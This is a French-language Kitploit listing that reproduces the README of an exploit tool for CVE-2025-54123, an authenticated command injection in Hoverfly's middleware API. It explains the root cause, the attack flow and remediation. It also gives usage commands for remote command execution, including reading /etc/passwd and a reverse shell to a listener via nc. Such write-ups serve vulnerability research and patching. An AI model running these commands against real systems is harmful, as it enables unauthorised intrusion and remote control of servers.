Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit — Exploit pour CVE-2025-54123, une injection de commandes OS authentifiée dans l'API middleware de Hoverfly, offrant des capacités de vérification seule, de commande unique, de shell interactif et de shell inversé pour les tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleArticles et RechercheApprentissage et ÉducationRed TeamingDéveloppement de Charges Utiles
GitHub0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit

Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit

Exploit pour CVE-2025-54123, une injection de commandes OS authentifiée dans l'API middleware de Hoverfly, offrant des capacités de vérification seule, de commande unique, de shell interactif et de shell inversé pour les tests de sécurité autorisés.

Voir le dépôt
13il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-54123 — Exécution de code à distance via l'API Middleware Hoverfly

RCE authentifié par injection de commande système dans Hoverfly ≤ 1.11.3

Présentation de la vulnérabilité

PropriétéValeur
ID CVECVE-2025-54123
Score CVSS9.8 — Critique
Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-78 (Injection de commande système), CWE-20 (Validation d'entrée inadéquate)
ProduitHoverfly — Outil open-source de simulation d'API
Versions affectéesToutes les versions jusqu'à 1.11.3 inclus
Corrigé dans1.12.0 (commit de correctif)
Avis de sécuritéGHSA-r4h8-hfp2-ggmf

Analyse technique

Voici une analyse approfondie du cas d'étude et une analyse technique en boîte blanche et boîte noire https://medium.com/@phantom_hat/cve-2025-54123-hoverfly-1-11-3-command-injection-rce-case-study-patch-diffing-aacc092f7f3a

Surface d'attaque

Hoverfly expose une API admin RESTful (port par défaut 8888) pour gérer les configurations de simulation. Le point de terminaison de gestion du middleware à /api/v2/hoverfly/middleware accepte un corps JSON avec les champs binary et script qui définissent un processus middleware externe.

Cause racine

La vulnérabilité provient d'une combinaison de trois défauts au niveau du code :

  1. Validation d'entrée insuffisante — middleware.go:93-96 : La fonction SetBinary() accepte le paramètre binary sans aucune validation ni assainissement, permettant à un attaquant de spécifier des exécutables arbitraires (par ex. bash).

  2. Exécution de commande non sécurisée — local_middleware.go:14-19 : Le middleware est exécuté via exec.Command() avec les valeurs binary et script contrôlées par l'attaquant passées directement comme arguments, permettant l'injection de commande système.

  3. Exécution immédiate lors du test — hoverfly_service.go:173 : Lorsque le middleware est défini via l'API, Hoverfly teste immédiatement le middleware en l'exécutant, déclenchant la commande injectée au moment de la configuration plutôt qu'au moment de l'interception du proxy.

Flux d'attaque

root@kitploit:~
Attacker                              Hoverfly (≤ 1.11.3)
   │                                        │
   │─── POST /api/token-auth ──────────────>│  (1) Authenticate
   │<── { "token": "eyJ..." } ─────────────│
   │                                        │
   │─── PUT /api/v2/hoverfly/middleware ───>│  (2) Inject payload
   │    { "binary": "bash",                 │
   │      "script": "<malicious cmd>" }     │
   │                                        │
   │    ┌──────────────────────────────────┐│
   │    │ exec.Command("bash", tmpScript)  ││  (3) Immediate execution
   │    │ → attacker command runs as       ││
   │    │   the Hoverfly process user      ││
   │    └──────────────────────────────────┘│
   │                                        │
   │<── Command output in error response ──│  (4) Exfiltrate output
   │                                        │

Utilisation de l'exploit

Prérequis

  • Python 3.8+
  • Identifiants valides pour l'API admin Hoverfly (par défaut : admin / mot de passe configurable)

Installation

root@kitploit:~
git clone https://github.com/<votre-utilisateur>/CVE-2025-54123.git
cd CVE-2025-54123
pip install -r requirements.txt

Modes d'opération

Mode vérification uniquement

Vérifier l'accessibilité de la cible et l'authentification sans exploitation :

root@kitploit:~
python3 exploit.py -u http://cible:8888 -U admin -P <motdepasse> -C

Exécution d'une commande unique

Exécuter une seule commande système sur la cible :

root@kitploit:~
python3 exploit.py -u http://cible:8888 -U admin -P <motdepasse> -c 'id'

Pseudo-shell interactif

Lancer une session shell persistante :

root@kitploit:~
python3 exploit.py -u http://cible:8888 -U admin -P <motdepasse> -i

Shell inverse

Envoyer un shell inverse vers votre écouteur :

root@kitploit:~
# Terminal 1 — démarrer l'écouteur
nc -lvnp 4444

# Terminal 2 — lancer l'exploit
python3 exploit.py -u http://cible:8888 -U admin -P <motdepasse> --revshell 10.0.0.1:4444

Mode verbeux avec proxy

Router le trafic via Burp Suite pour inspection :

root@kitploit:~
python3 exploit.py -u http://cible:8888 -U admin -P <motdepasse> -c 'cat /etc/passwd' --proxy -v

Référence complète des drapeaux

DrapeauDescriptionDéfaut
-u, --urlURL de la cible HoverflyRequis
-U, --usernameNom d'utilisateur adminRequis
-P, --passwordMot de passe adminRequis
-c, --commandCommande système à exécuter—
-C, --checkMode vérification uniquement (sans exploitation)false
-i, --interactivePseudo-shell interactiffalse
--revshellShell inverse LHOST:LPORT—
--proxyRouter via 127.0.0.1:8080false
--timeoutDélai d'attente de la requête (secondes)15
-v, --verboseActiver la sortie verbeusefalse

Remédiation

ActionDétails
Mise à niveauMettre à jour Hoverfly vers v1.12.0 ou ultérieure, où l'API de définition du middleware est désactivée par défaut
Segmentation réseauRestreindre l'accès à l'API admin Hoverfly (port 8888) aux réseaux de confiance uniquement
AuthentificationUtiliser des mots de passe forts et uniques pour l'API admin Hoverfly
SurveillanceSurveiller les requêtes PUT inattendues vers /api/v2/hoverfly/middleware

Détails du correctif

Le correctif dans le commit 17e60a9 désactive l'API de définition du middleware par défaut. Les modifications ultérieures de la documentation (commit a9d4da7) informent les utilisateurs des implications de sécurité de l'exposition de ce point de terminaison.


Références

  • NVD — CVE-2025-54123
  • Avis de sécurité GitHub — GHSA-r4h8-hfp2-ggmf
  • Code vulnérable — hoverfly_service.go#L173
  • Code vulnérable — middleware.go#L93
  • Code vulnérable — local_middleware.go#L13
  • Commit de correctif — 17e60a9

Avertissement

Cet outil est fourni uniquement à des fins de tests de sécurité autorisés et de recherche éducative. L'accès non autorisé à des systèmes informatiques est illégal en vertu du Computer Fraud and Abuse Act (CFAA) et des lois équivalentes dans le monde entier. L'auteur décline toute responsabilité en cas d'utilisation abusive de ce logiciel. Obtenez toujours une autorisation écrite explicite avant de tester tout système qui ne vous appartient pas.


Structure du projet

root@kitploit:~
CVE-2025-54123/
├── Exploit/
│   ├── exploit.py          # Exploit perfectionné
│   └── raw_exploit.py      # PoC brut original
├── Images/                 # Captures d'écran de recherche
├── Reference/              # Exploits de référence pour étude
├── requirements.txt        # Dépendances Python
└── README.md               # Ce fichier

Auteur

Phantom Hat — Chercheur en sécurité


Cette recherche a été menée dans le cadre d'une étude de cas de vulnérabilité à des fins éducatives.

Télécharger l’outil